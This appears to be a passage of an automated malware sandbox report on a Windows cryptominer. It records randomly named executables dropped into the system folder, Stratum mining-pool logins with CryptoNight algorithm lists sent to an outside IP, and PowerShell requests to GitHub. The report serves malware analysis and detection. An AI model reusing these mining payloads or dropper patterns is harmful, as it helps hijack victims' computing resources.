Source: C:\Windows\System\xIpouRJ.exe	Code function: 4_2_00007FF66685EBF0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,	4_2_00007FF66685EBF0
Source: C:\Windows\System\ERbKWDm.exe	Code function: 5_2_00007FF67DC2EBF0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,	5_2_00007FF67DC2EBF0
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3BBEBF0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,	6_2_00007FF7C3BBEBF0
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEAEEBF0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,	7_2_00007FF6BEAEEBF0
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3D3EBF0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,	8_2_00007FF6B3D3EBF0
Source: C:\Windows\System\wkazDeV.exe	Code function: 9_2_00007FF68B36EBF0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,	9_2_00007FF68B36EBF0
Source: C:\Windows\System\VWrcuzM.exe	Code function: 10_2_00007FF74838EBF0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,GetLastError,	10_2_00007FF74838EBF0

Detected Stratum mining protocol

Source: global traffic	TCP traffic: 192.168.2.7:49702 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49739 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49790 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49830 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49831 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49832 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49833 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49834 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49835 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49836 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.
Source: global traffic	TCP traffic: 192.168.2.7:49837 -> 3.120.98.217:8080 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"h/ (windows nt 10.0; win64; x64) libuv/1.31.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/wow","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double"]}}.

Found strings related to Crypto-Mining

Source: xIpouRJ.exe	String found in binary or memory: stratum+tcp://
Source: xIpouRJ.exe	String found in binary or memory: cryptonight/0
Source: xIpouRJ.exe	String found in binary or memory: stratum+tcp://

Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.154:443 -> 192.168.2.7:49821 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.7:49702 -> 3.120.98.217:8080

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 140.82.121.4 140.82.121.4
Source: Joe Sandbox View	IP Address: 3.120.98.217 3.120.98.217
Source: Joe Sandbox View	IP Address: 185.199.111.133 185.199.111.133
Source: Joe Sandbox View	IP Address: 185.199.110.154 185.199.110.154

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: FASTLYUS FASTLYUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/dark-9c5b7a476542.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/light-3e154969b9f9.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/primer-primitives-4cf0d59ab51a.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/primer-fefb1a332c28.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/global-103ebe55f9d9.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/github-6da540aa3f84.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/dashboard-a70f6c490d6e.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/experiments-d77f07364a5f.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/site-fbd7cf8f6ba2.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/discussions-adf1d1b8b95c.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/home-339181319b7e.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/primer-react-css.8879c83c1311e6328466.module.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/wp-runtime-f35b332dbe90.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_dompurify_dist_purify_js-b73fdff77a4e.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-56729c905fe2.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-247092-b9c7cf3107b7.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/environment-2f240f7ed1b3.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/ui_packages_failbot_failbot_ts-aabfa4ec15fe.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-4aa4b0e95669.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_auto-complete-element_dist_index_js-a164c5ea9f62.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_relative-time-element_dist_index_js-6d3967acd51c.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_text-expander-element_dist_index_js-e40ed7658a74.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-d1a841-8f251a0656e7.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f4b251-f7c3b6081b19.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-6b2a62-6fef0f2ad42a.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-eb9d54-74622d897749.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/github-elements-36d7dcef5a08.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/element-registry-f52a50a0449b.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_primer_live-region-element_dis-428401-bb66ac5d7472.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-634de60bacfa.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_lit-html_lit-html_js-ce7225a304c5.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-f3aee1-e6893db9c19e.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-f8a5485c982a.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-858e043fcf76.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_scroll-anchoring_dist_scroll-anchoring_esm_js-node_modules_stacktrace-pa-a71630-67856ad29bae.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_color-convert_index_js-0e07cc183eed.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
